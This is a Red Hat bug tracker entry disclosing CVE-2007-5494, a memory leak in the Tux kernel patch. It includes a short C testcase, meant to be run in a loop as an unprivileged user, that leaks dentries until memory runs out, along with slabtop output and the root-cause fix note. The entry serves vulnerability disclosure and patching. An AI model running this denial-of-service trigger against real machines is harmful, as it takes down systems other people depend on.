Hide Forgot
Due issue described in https://bugzilla.redhat.com/show_bug.cgi?id=313681 open(O_ATOMICLOOKUP) leaks the dentry on the filesystems where d_revalidate is implemented. i.e open ("/proc/self/exe", O_RDONLY); open ("/proc/self/exe", O_RDONLY | 02000000); leaks one dentry. By this way it's possible to eat all the memory on the node or overflow dentry->d_count. Both RHEL4 and RHEL5 kernels are vulnerabled Acknowledgements: Red Hat would like to credit Vasily Averin for reporting this issue.
compile the following testcase, run it in a cycle as a user and watch memory leaks via slabtop $ cat tst.c #include <errno.h> #include <fcntl.h> #include <stdio.h> #include <unistd.h> int main (int argc, char *argv[]) { open ("/proc/self/exe", O_RDONLY); open ("/proc/self/exe", O_RDONLY | 02000000); } Active / Total Objects (% used) : 2082610 / 2086261 (99.8%) Active / Total Slabs (% used) : 94487 / 94488 (100.0%) Active / Total Caches (% used) : 95 / 140 (67.9%) Active / Total Size (% used) : 360064.96K / 360385.06K (99.9%) Minimum / Average / Maximum Object : 0.01K / 0.17K / 128.00K OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME 688286 688286 100% 0.13K 23734 29 94936K dentry_cache 682869 682869 100% 0.35K 62079 11 248316K proc_inode_cache 682558 682558 100% 0.04K 6758 101 27032K pid 3672 3642 99% 0.05K 51 72 204K buffer_head 3276 3166 96% 0.04K 39 84 156K sysfs_dir_cache 2576 2483 96% 0.08K 56 46 224K vm_area_struct 2424 2417 99% 0.48K 303 8 1212K ext3_inode_cache 2373 2373 100% 0.03K 21 113 84K size-32 1991 1974 99% 0.33K 181 11 724K inode_cache 1820 1800 98% 0.27K 130 14 520K radix_tree_node 1475 1295 87% 0.06K 25 59 100K size-64 1350 1350 100% 0.12K 45 30 180K size-128 1016 871 85% 0.01K 4 254 16K anon_vma 1008 817 81% 0.16K 42 24 168K filp 858 690 80% 0.05K 11 78 44K selinux_inode_security 736 648 88% 0.04K 8 92 32K Acpi-Operand 444 422 95% 2.00K 222 2 888K size-2048 376 376 100% 0.50K 47 8 188K size-512 375 375 100% 0.25K 25 15 100K size-256 360 294 81% 0.19K 18 20 72K skbuff_head_cache 360 301 83% 0.09K 9 40 36K bio 338 297 87% 0.02K 2 169 8K Acpi-Namespace 288 268 93% 0.43K 32 9 128K shmem_inode_cache 254 8 3% 0.01K 1 254 4K revoke_table 236 236 100% 0.06K 4 59 16K fs_cache
Mark, it's tux, via linux-2.6-tux.patch, which introduces this: ... need_revalidate: + if (atomic) + return -EWOULDBLOCKIO; if (dentry->d_op->d_revalidate(dentry, nd)) goto done; if (d_invalidate(dentry)) that return forgets to drop the dentry -Eric
told vendor-sec under embargo
No other vendor said they were vulnerable to this. Description used in text: A memory leak was found in the Tux HTTP accelerator patch. A local user could use this flaw to cause a denial of service (memory exhaustion). (CVE-2007-5494) Removing embargo.
All z-stream children bugs have been closed, future tracking bugs still open, parent is no longer needed.